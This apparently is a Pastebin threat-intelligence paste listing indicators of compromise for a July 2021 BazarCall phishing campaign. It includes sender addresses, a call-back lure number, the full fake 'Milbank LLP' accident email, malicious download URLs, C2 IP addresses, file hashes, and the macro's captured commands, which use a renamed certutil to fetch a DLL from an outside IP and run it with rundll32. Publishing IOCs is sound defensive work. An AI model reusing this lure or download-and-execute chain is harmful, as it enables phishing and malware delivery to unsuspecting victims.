API tools faq
paste
ExecuteMalware

2021-07-27 BazarCall IOCs

ExecuteMalware
Jul 27th, 2021
15,837
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.25 KB | None | 0 0
raw download clone embed print report
  1. THREAT IDENTIFICATION: BAZARCALL
  2.  
  3. SUBJECTS OBSERVED
  4. Notification email of an abandoned road accident site! Need to to get in touch with a manager!
  5. Notification letter of an abandoned highway accident site! Should to get hold of a supervisor!
  6. Notification letter of an abandoned highway accident site! Must to get hold of a supervisor!
  7.  
  8. SENDERS OBSERVED
  9. [email protected]
  10. [email protected]
  11. [email protected]
  12. [email protected]
  13. [email protected]
  14.  
  15. LURE PHONE NUMBER
  16. 1 313 217 5223
  17.  
  18. EMAIL BODY
  19. Milbank LLP Insurance company
  20.  
  21. Re: Accident on 07/12/2021
  22.  
  23. Case Number: L0XXXXXXXXX
  24.  
  25. Dear <First> <Last>,
  26.  
  27. This mail is to notify you that the vehicle that is documented on your name has left the location of the accident on 07/12/2021.
  28.  
  29. In case you would like to see the complete information about the car that has been related to the car accident and images and video material confirming the incident, please remember to get in touch with us from 9 am thru 6 pm ET at:1 313 217 5223. Our agents will give you all the details you may need.
  30.  
  31. You must get in touch with us immediately or we will have to submit a report regarding an incident to authorities.
  32.  
  33. Regards,
  34. Milbank LLP Insurance company
  35.  
  36. MALDOC LANDING PAGES
  37. https://milbankllp.net/
  38. https://milbankllp.net/order
  39. https://milbankllp.net/case
  40.  
  41. MALDOC DOWNLOAD URL
  42. https://milbankllp.net/download.php
  43.  
  44. BAZARCALL MALDOC FILE HASHES
  45. case_L0XXXXXXXXX.xlsb
  46. 535f0ae54da4ce0b5b9aedae9a3efa85
  47.  
  48. case_L0XXXXXXXXX.xlsb
  49. 39757aa22acd02291e185ce4c087dad0
  50.  
  51. CAPTURED COMMANDS FROM MACROS:
  52. cmd.exe [580]
  53. "C:\Windows\System32\cmd.exe" /c mkdir %programdata%\DYdPAHU && copy /b %SystemRoot%\System32\c*tutil.exe c:\programdata\DYdPAHU\DYdPAHU.exe
  54.  
  55. cmd.exe [1852]
  56. "C:\Windows\System32\cmd.exe" /c c:\programdata\DYdPAHU\DYdPAHU.exe -urlcache -f -split http://37.10.71.16 c:\programdata\DYdPAHU\DYdPAHU.dll
  57.  
  58. cmd.exe [1540]
  59. "C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\DYdPAHU\DYdPAHU.dll,GlobalOut
  60.  
  61. BAZAR PAYLOAD DOWNLOAD URL
  62. http://37.10.71.16
  63.  
  64. BAZAR PAYLOAD FILE HASHES
  65. (This is certutil just renamed)
  66. DYdPAHU.exe
  67. 0d52559aef4aa5eac82f530617032283
  68.  
  69. DYdPAHU.dll
  70. 1b5565aabbcc5a2218d05c816009c7a4
  71.  
  72. BAZAR C2
  73. https://13.52.241.196/req/proc
  74. https://195.123.233.106/req/proc
  75.  
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!